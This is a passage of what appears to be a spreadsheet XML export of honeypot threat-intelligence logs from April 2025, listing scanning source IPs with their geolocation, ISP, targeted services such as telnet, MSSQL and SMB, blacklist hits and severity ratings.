    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;977&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Basant Nagar Colony)"/>
    <s v="1269843"/>
    <s v="500013"/>
    <s v="17.3932"/>
    <s v="78.4917"/>
    <s v="55410"/>
    <s v="Vodafone Idea Ltd. (VIL)"/>
    <s v="Vodafone Idea Ltd."/>
    <s v="business"/>
    <s v="Vodafone Idea Ltd."/>
    <s v="None"/>
    <s v="VIL-IN"/>
    <s v="None"/>
    <s v="query&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b613:c9e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2618"/>
    <x v="2618"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:22:28"/>
    <d v="2025-04-07T23:57:56"/>
    <d v="2025-04-08T10:22:28"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:9b57"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2619"/>
    <x v="2619"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:06:39"/>
    <d v="2025-04-07T20:28:46"/>
    <d v="2025-04-08T10:06:39"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="NME-Project"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d3:8088"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2620"/>
    <x v="2620"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:02:11"/>
    <d v="2025-04-08T10:02:11"/>
    <d v="2025-04-08T10:02:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="AL"/>
    <s v="Albania"/>
    <s v="11"/>
    <s v="Tirana"/>
    <s v="Bashkia Tiranë"/>
    <s v="Tirana"/>
    <s v="3183875"/>
    <s v="NA"/>
    <s v="41.3275"/>
    <s v="19.8189"/>
    <s v="216046"/>
    <s v="tele-co-tirana"/>
    <s v="Teleco First"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4df7:5885"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2621"/>
    <x v="2621"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:59:44"/>
    <d v="2025-04-08T09:59:44"/>
    <d v="2025-04-08T09:59:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:7bf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2622"/>
    <x v="2622"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:55:13"/>
    <d v="2024-02-18T14:23:45"/>
    <d v="2025-04-08T09:55:13"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="22&amp;&amp;22094&amp;&amp;445&amp;&amp;3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2007-01-11"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b1a:fa0f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2623"/>
    <x v="2623"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:51:26"/>
    <d v="2025-04-08T09:51:26"/>
    <d v="2025-04-08T09:51:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:4bd0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2624"/>
    <x v="2624"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:45:53"/>
    <d v="2025-04-08T08:27:51"/>
    <d v="2025-04-08T09:45:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="Dokki"/>
    <s v="Giza"/>
    <s v="360995"/>
    <s v="NA"/>
    <s v="30.0383"/>
    <s v="31.2102"/>
    <s v="8452"/>
    <s v="TE-AS"/>
    <s v="TE Data"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-11-05"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:292a:303c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2625"/>
    <x v="2625"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:39:20"/>
    <d v="2025-04-08T09:39:20"/>
    <d v="2025-04-08T09:39:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PA"/>
    <s v="Pará"/>
    <s v="Redenção"/>
    <s v="Redenção"/>
    <s v="6318107"/>
    <s v="NA"/>
    <s v="-8.02861"/>
    <s v="-50.0314"/>
    <s v="262404"/>
    <s v="AS262404"/>
    <s v="Jc Servicos De Internet Ltda"/>
    <s v="corporate"/>
    <s v="Jc Servicos De Internet Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bf07:47c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2626"/>
    <x v="2626"/>
    <s v="cm-171-101-4-138.revip11.asianet.co.th"/>
    <x v="0"/>
    <d v="2025-04-08T09:37:18"/>
    <d v="2025-04-08T09:34:57"/>
    <d v="2025-04-08T09:37:18"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="20"/>
    <s v="Chon Buri"/>
    <s v="Bang Lamung"/>
    <s v="Pattaya"/>
    <s v="1614295"/>
    <s v="NA"/>
    <s v="12.9333"/>
    <s v="100.883"/>
    <s v="17552"/>
    <s v="TRUE INTERNET CORPORATION CO. LTD."/>
    <s v="True Internet Corporation CO. Ltd."/>
    <s v="residential"/>
    <s v="Truenet BB"/>
    <s v="2011-03-07"/>
    <s v="TRUENET-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['CLARINET.ASIANET.CO.TH', 'CONDUCTOR.ASIANET.CO.TH', 'PIANO.ASIANET.CO.TH']"/>
    <s v="THNIC"/>
    <s v="ACTIVE"/>
    <s v="None"/>
    <x v="21"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ab65:48a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2627"/>
    <x v="2627"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:29:43"/>
    <d v="2025-04-08T09:13:26"/>
    <d v="2025-04-08T09:29:43"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b61:b6a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2628"/>
    <x v="2628"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:25:27"/>
    <d v="2025-04-07T21:48:14"/>
    <d v="2025-04-08T09:25:27"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d01:820e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2629"/>
    <x v="2629"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:20:09"/>
    <d v="2025-04-08T09:20:09"/>
    <d v="2025-04-08T09:20:09"/>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f:a052"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2630"/>
    <x v="2630"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T09:17:27"/>
    <d v="2023-08-10T20:47:00"/>
    <d v="2025-04-08T09:17:27"/>
    <n v="1918"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SSH_H6&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;389&amp;&amp;32908&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18416"/>
    <s v="106.831"/>
    <s v="9228"/>
    <s v="PT. Total Info Kharisma"/>
    <s v="PT. Total Info Kharisma"/>
    <s v="business"/>
    <s v="Centralonline"/>
    <s v="1997-04-11"/>
    <s v="CENTRALONLINE"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,58836)}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,61076)}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,56507)}&amp;&amp;{Data_SMB:Incoming connection (203.77.231.14,56796)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb4d:e70e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2631"/>
    <x v="2631"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T08:48:29"/>
    <d v="2024-04-20T08:52:25"/>
    <d v="2025-04-08T08:48:29"/>
    <n v="794"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_POP3_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25551&amp;&amp;16521&amp;&amp;23&amp;&amp;49272&amp;&amp;49878&amp;&amp;55204&amp;&amp;110&amp;&amp;54134&amp;&amp;56904&amp;&amp;49306&amp;&amp;443&amp;&amp;49705&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8441"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2632"/>
    <x v="2632"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T08:33:03"/>
    <d v="2025-04-08T00:48:48"/>
    <d v="2025-04-08T08:33:03"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:7919"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2633"/>
    <x v="2633"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T08:23:10"/>
    <d v="2025-04-01T06:22:10"/>
    <d v="2025-04-08T08:23:10"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="21"/>
    <s v="Thanh Hóa Province"/>
    <s v="Thành Phố Thanh Hóa"/>
    <s v="Thanh Hóa"/>
    <s v="1566166"/>
    <s v="NA"/>
    <s v="19.8"/>
    <s v="105.767"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a8:e187"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2634"/>
    <x v="2634"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T08:13:27"/>
